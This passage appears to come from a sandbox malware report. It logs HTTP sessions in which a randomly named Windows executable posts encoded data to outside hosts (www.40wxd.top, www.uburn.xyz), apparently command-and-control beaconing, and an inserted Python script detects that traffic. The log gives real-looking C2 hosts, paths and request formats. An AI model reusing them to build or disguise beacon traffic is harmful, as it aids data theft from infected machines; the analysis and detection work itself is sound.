2 | 192.168.2.5 | 49973 | 206.119.82.134 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:38:09.632733107 CEST | 732 | OUT
POST /l8if/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.40wxd.top
Origin: http://www.40wxd.top
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Referer: http://www.40wxd.top/l8if/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Data Raw: 6e 56 3d 53 5a 66 34 5a 58 5a 4c 52 75 44 38 6e 41 70 43 70 42 4e 35 43 4c 69 74 33 46 46 41 71 59 4b 74 36 54 79 4e 47 32 30 67 54 69 6d 30 69 6e 43 63 44 37 56 6d 33 6c 49 4c 62 2f 4d 36 6d 6d 2b 31 64 71 42 56 52 50 52 74 70 42 32 45 6d 35 7a 47 62 58 73 37 6d 6d 52 51 75 68 54 4d 4b 31 4f 77 71 44 6a 6f 54 61 48 30 4e 51 6c 5a 62 77 33 41 62 69 58 48 56 34 2f 47 51 6f 6d 68 76 63 4e 4f 33 74 58 74 76 73 49 49 52 4d 4e 52 69 65 6e 69 69 4e 61 65 79 62 4b 55 31 36 39 67 67 64 4d 69 78 50 4d 6a 36 51 31 74 45 49 32 50 6c 69 6c 76 50 70 4b 53 67 50 5a 61 59 32 72 69 4a 39 72 6d 6b 77 56 6c 6a 33 76 52 39 54 42 31 4e 4b 4a 49 51 6e 5a 37 31 77 56 33 56 6e 77 37
Data Ascii: nV=SZf4ZXZLRuD8nApCpBN5CLit3FFAqYKt6TyNG20gTim0inCcD7Vm3lILb/M6mm+1dqBVRPRtpB2Em5zGbXs7mmRQuhTMK1OwqDjoTaH0NQlZbw3AbiXHV4/GQomhvcNO3tXtvsIIRMNRieniiNaeybKU169ggdMixPMj6Q1tEI2PlilvPpKSgPZaY2riJ9rmkwVlj3vR9TB1NKJIQnZ71wV3Vnw7
Oct 8, 2024 15:38:10.550307989 CEST | 289 | IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:38:10 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49978 | 206.119.82.134 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:38:12.182101965 CEST | 1749 | OUT
POST /l8if/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.40wxd.top
Origin: http://www.40wxd.top
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1239
Referer: http://www.40wxd.top/l8if/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Data Raw: 6e 56 3d 53 5a 66 34 5a 58 5a 4c 52 75 44 38 6e 41 70 43 70 42 4e 35 43 4c 69 74 33 46 46 41 71 59 4b 74 36 54 79 4e 47 32 30 67 54 6a 65 30 69 77 43 63 52 6f 4e 6d 32 6c 49 4c 46 50 4d 2f 6d 6d 2b 30 64 75 74 5a 52 50 63 50 70 48 79 45 6e 63 6e 47 64 6c 55 37 73 6d 52 51 6a 42 54 33 58 46 4f 68 71 44 7a 6b 54 61 33 30 4e 51 6c 5a 62 32 7a 41 64 7a 58 48 54 34 2f 46 52 6f 6d 39 72 63 4e 6d 33 74 66 39 76 73 39 39 52 66 56 52 69 2b 33 69 67 2f 69 65 6f 62 4b 57 30 36 39 34 67 59 55 74 78 50 41 46 36 52 78 58 45 49 4f 50 31 46 6c 79 61 74 44 4b 6a 35 35 57 61 32 50 6b 5a 71 37 5a 70 79 4e 53 75 45 6e 6b 67 41 74 46 46 4f 70 52 45 53 77 31 72 6c 42 59 54 43 4e 71 35 39 4b 52 78 62 42 39 31 5a 63 4b 69 65 6b 63 46 63 4f 63 6c 6e 47 4c 72 53 37 67 41 48 37 4b 70 49 68 4c 5a 41 78 46 7a 46 55 6c 59 48 54 58 6f 6b 74 4b 6c 79 44 54 6e 51 64 71 6a 7a 4d 38 51 6d 70 4c 6e 44 4b 45 34 54 61 68 67 55 56 65 32 42 4c 33 72 79 35 63 70 66 58 69 52 6f 4c 44 66 62 35 38 4e 46 63 4b 4a 6e 79 33 4c 71 43 58 53 4c 2f [TRUNCATED]
Data Ascii: nV=SZf4ZXZLRuD8nApCpBN5CLit3FFAqYKt6TyNG20gTje0iwCcRoNm2lILFPM/mm+0dutZRPcPpHyEncnGdlU7smRQjBT3XFOhqDzkTa30NQlZb2zAdzXHT4/FRom9rcNm3tf9vs99RfVRi+3ig/ieobKW0694gYUtxPAF6RxXEIOP1FlyatDKj55Wa2PkZq7ZpyNSuEnkgAtFFOpRESw1rlBYTCNq59KRxbB91ZcKiekcFcOclnGLrS7gAH7KpIhLZAxFzFUlYHTXoktKlyDTnQdqjzM8QmpLnDKE4TahgUVe2BL3ry5cpfXiRoLDfb58NFcKJny3LqCXSL/7Tjb1AJlBULXhai7gr4mdmjZE/W3UtJMTlYCsbCmkBkwdPfqEIsWy63lWKRIdpMPhzigL3SbZMJ9SsQ3LmcNo8Yccj+7QO+f2zSoU9WZjNjsoysjiFEzOO6x6rJqnCFgFFvL16wVNy9i/9JeScTCXN6z/AeWZ5GuUa9YvrH3gHuxbKA6UPCsLJAdhCrC/CDmlS0/6C+f11KbcqdTPLsC0Tf7AgGNOCASKzNDcYFWCDtWqaUEliJXvIJ7CNPmTVNFZpXJrn0b5UY6T3s8VcLcvq3m5wfcGQclZi7x7fhWJd8TbUlUN+WB1N+Ze+mi0r8toaE06wMch3iEICQhisUCGA6e4IfLFYYXm1JGDwZPhfaqRT8OO5/AAhbWxV2snyta9AVXYqmExUxYXXG/Vy/Rg1SDBJkh1XsT5vFGosyYu6KEOADfSOkY/naNX/Z+xRx2vNauLa2V5Ij3H7Wd2Q9J60uph+Y+k2H7wFDSIY8fytQu4koe8QmrAWP3BAdmTzLuOf404mge57VjY9ONVyKAkJDoeFydZVheb1XI0Pj6rX6+SrztZzEKjtAeVHC7Xlhc5BQJuSiXmapfgg23sUgUmwSz20MqntPWBJLeLgdWjGrfevSo69n58/8T9IUrfh8m2EsMe//PX4GYtMxOkacCrfv5p7K8tIbGVN [TRUNCATED]
Oct 8, 2024 15:38:13.091316938 CEST | 289 | IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:38:12 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49979 | 206.119.82.134 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:38:14.722811937 CEST | 467 | OUT
GET /l8if/?nV=fb3YagVOau/9jH9KlQpUGbOr1Qdfq6yMjiH+G1UmZCjbhiKuBNxm8T0bbvZrtC77cOtGQaEUv2efn6v6V0Ivj11bpGL/ZxGuw2XpQMT5FisIZ1T3bTfJHsfnS4K0yfQKpg==&ntHx=DVDDWR70P4Ux HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.40wxd.top
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 8, 2024 15:38:15.641633987 CEST | 289 | IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:38:15 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
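The sessions above all come from one process (PID 4568) and share a fixed shape: a User-Agent claiming Windows NT 5.1 with the Chrome/Safari tokens missing, a single four-character directory as the path, a GET carrying exactly two query parameters (ntHx and nV), a POST whose body is a single nV= parameter and whose Origin and Referer are rebuilt from the Host, Connection: close on every request, and a new host every few seconds while the servers answer 301 or 404. The following Python is an added example and not part of the Joe Sandbox report: it parses raw HTTP requests, names which of those traits each one carries, and flags a PID that contacts several distinct hosts inside a short window. The first four sample records are re-typed from sessions 0, 1, 4 and 5 with the encoded payloads shortened; the www.example.com request from PID 1234, the indicator names, the four-character path regex and the thresholds (3 indicators, 3 hosts in 120 s) are assumptions chosen for illustration.

```python
"""Score raw HTTP requests against the traits shared by the beacons in this report.

Added example; not part of the Joe Sandbox output. Indicator names, thresholds,
the path regex and the www.example.com / PID 1234 record are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

# Exact User-Agent seen in every request above: an XP-era token with no Chrome/Safari suffix.
UA_XP_TRUNCATED = "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)"
# Paths seen above are a single four-character, lowercase-alphanumeric directory (assumed pattern).
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query parameter names, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    params = [kv.split("=", 1)[0] for kv in query.split("&") if kv]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "params": params, "headers": headers, "body": body}


def request_indicators(req: dict) -> list:
    """Return the names of the traits of one parsed request that match the sessions above."""
    h = req["headers"]
    hits = []
    if h.get("user-agent") == UA_XP_TRUNCATED:
        hits.append("xp-ua-no-chrome-token")
    if PATH_RE.match(req["path"]):
        hits.append("four-char-path")
    if req["method"] == "GET" and len(req["params"]) == 2:
        hits.append("get-two-params")
    if req["method"] == "POST":
        host = h.get("host", "")
        body_keys = [kv.split("=", 1)[0] for kv in req["body"].split("&") if kv]
        # Origin and Referer are derived from Host and path, not from any page the client visited.
        if h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{req['path']}":
            hits.append("self-referencing-origin-referer")
        if len(body_keys) == 1 and h.get("content-type") == "application/x-www-form-urlencoded":
            hits.append("post-single-param")
    if h.get("connection") == "close":
        hits.append("connection-close")
    return hits


def is_suspicious(raw: str, threshold: int = 3) -> bool:
    """A request carrying at least `threshold` indicators (assumed cut-off) is reported."""
    return len(request_indicators(parse_request(raw))) >= threshold


def host_rotation(records, window_seconds: int = 120, min_hosts: int = 3) -> dict:
    """Map PID -> sorted hosts for processes that reach min_hosts distinct Host values within window_seconds."""
    by_pid = defaultdict(list)
    for ts, pid, raw in records:
        by_pid[pid].append((datetime.fromisoformat(ts), parse_request(raw)["headers"].get("host", "")))
    flagged = {}
    for pid, events in by_pid.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            hosts = {h for t, h in events[i:] if (t - t0).total_seconds() <= window_seconds}
            if len(hosts) >= min_hosts:
                flagged[pid] = sorted(hosts)
                break
    return flagged


def _req(method, target, host, extra=(), body=""):
    """Assemble a raw request with the fixed header set used by the sample's requests."""
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}", "Connection: close",
             f"User-Agent: {UA_XP_TRUNCATED}", *extra]
    return "\r\n".join(lines) + "\r\n\r\n" + body


def _post_hdrs(host, path):
    """The Origin/Referer/Content-Type trio seen on every POST above."""
    return [f"Origin: http://{host}", f"Referer: http://{host}{path}",
            "Content-Type: application/x-www-form-urlencoded"]


# (timestamp, PID, raw request). The first four are re-typed from sessions 0, 1, 4 and 5 above
# with payloads shortened; the last is a constructed benign request from another process.
SAMPLE_RECORDS = [
    ("2024-10-08T15:37:50", 4568, _req("GET", "/7mju/?ntHx=DVDDWR70P4Ux&nV=n%2Fa1XN", "www.newdaydawning.net")),
    ("2024-10-08T15:38:07", 4568, _req("POST", "/l8if/", "www.40wxd.top",
                                       _post_hdrs("www.40wxd.top", "/l8if/"), "nV=SZf4ZXZLRuD8")),
    ("2024-10-08T15:38:14", 4568, _req("GET", "/l8if/?nV=fb3YagVOau&ntHx=DVDDWR70P4Ux", "www.40wxd.top")),
    ("2024-10-08T15:38:20", 4568, _req("POST", "/iqqs/", "www.uburn.xyz",
                                       _post_hdrs("www.uburn.xyz", "/iqqs/"), "nV=S5nO3ybs7ms6")),
    ("2024-10-08T15:38:22", 1234, "GET /index.html?lang=en HTTP/1.1\r\nHost: www.example.com\r\n"
                                  "Connection: keep-alive\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
                                  "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36\r\n\r\n"),
]

if __name__ == "__main__":
    for ts, pid, raw in SAMPLE_RECORDS:
        req = parse_request(raw)
        print(ts, pid, req["method"], req["headers"].get("host"), request_indicators(req), is_suspicious(raw))
    print("host rotation:", host_rotation(SAMPLE_RECORDS))
```

The per-request indicators are deliberately weak on their own (Connection: close and a short path are common), so the script only reports a request once several coincide, and it treats host rotation by one PID as the strongest signal because it survives the operator changing the User-Agent or path length. Feed it records from a proxy or EDR log with the same (timestamp, PID, raw request) shape to apply the same scoring to live traffic.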


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.54998067.223.117.189804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:38:20.794939995 CEST712OUTPOST /iqqs/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.uburn.xyz
                                                                                                                  Origin: http://www.uburn.xyz
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Referer: http://www.uburn.xyz/iqqs/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 53 35 6e 4f 33 79 62 73 37 6d 73 36 54 61 39 73 50 4f 57 2f 74 73 77 74 6e 74 73 4b 42 7a 32 69 32 64 4b 4a 2f 69 63 41 54 41 50 57 4f 70 57 72 30 68 68 74 39 66 70 6f 4c 4d 68 53 68 79 65 64 4d 7a 63 59 65 61 42 77 46 64 7a 4d 31 50 41 66 44 51 4b 50 6d 78 53 79 7a 5a 6a 33 68 67 6e 69 43 72 2b 42 41 34 54 74 61 47 70 45 67 31 4f 55 6b 4e 68 55 45 56 43 74 6f 68 6e 5a 2b 30 50 71 4d 68 30 31 4f 39 61 4b 51 34 77 72 44 68 4d 45 6d 4f 38 64 44 6f 44 70 59 6e 33 79 39 70 55 36 76 58 32 4e 71 54 74 4e 43 59 41 58 30 51 56 68 5a 6a 53 6a 6c 33 7a 43 77 68 50 72 6d 35 6b 4e 4b 64 33 4e 38 4c 59 3d
                                                                                                                  Data Ascii: nV=S5nO3ybs7ms6Ta9sPOW/tswtntsKBz2i2dKJ/icATAPWOpWr0hht9fpoLMhShyedMzcYeaBwFdzM1PAfDQKPmxSyzZj3hgniCr+BA4TtaGpEg1OUkNhUEVCtohnZ+0PqMh01O9aKQ4wrDhMEmO8dDoDpYn3y9pU6vX2NqTtNCYAX0QVhZjSjl3zCwhPrm5kNKd3N8LY=
Oct 8, 2024 15:38:21.384052992 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 08 Oct 2024 13:38:21 GMT
                                                                                                                  Server: Apache
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Content-Length: 32106
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
Oct 8, 2024 15:38:21.384069920 CEST | 1236 | IN | Data Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                                                                                                  Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
Oct 8, 2024 15:38:21.384082079 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                                                                                                  Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
Oct 8, 2024 15:38:21.384094000 CEST | 1236 | IN | Data Raw: 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png"
Oct 8, 2024 15:38:21.384105921 CEST | 896 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d
                                                                                                                  Data Ascii: <a class="navbar-brand pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" da
Oct 8, 2024 15:38:21.384366035 CEST | 1236 | IN | Data Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
Oct 8, 2024 15:38:21.384598017 CEST | 1236 | IN | Data Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                                                                                                                  Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
Oct 8, 2024 15:38:21.384610891 CEST | 448 | IN | Data Raw: 61 64 65 72 32 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: ader2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
Oct 8, 2024 15:38:21.385274887 CEST | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20
                                                                                                                  Data Ascii: > <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
Oct 8, 2024 15:38:21.385665894 CEST | 1236 | IN | Data Raw: 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64
                                                                                                                  Data Ascii: ></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>
Oct 8, 2024 15:38:21.390625000 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Footer 1</a>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49981 | 67.223.117.189 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:38:23.349253893 CEST | 732 | OUT | POST /iqqs/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.uburn.xyz
                                                                                                                  Origin: http://www.uburn.xyz
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Referer: http://www.uburn.xyz/iqqs/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
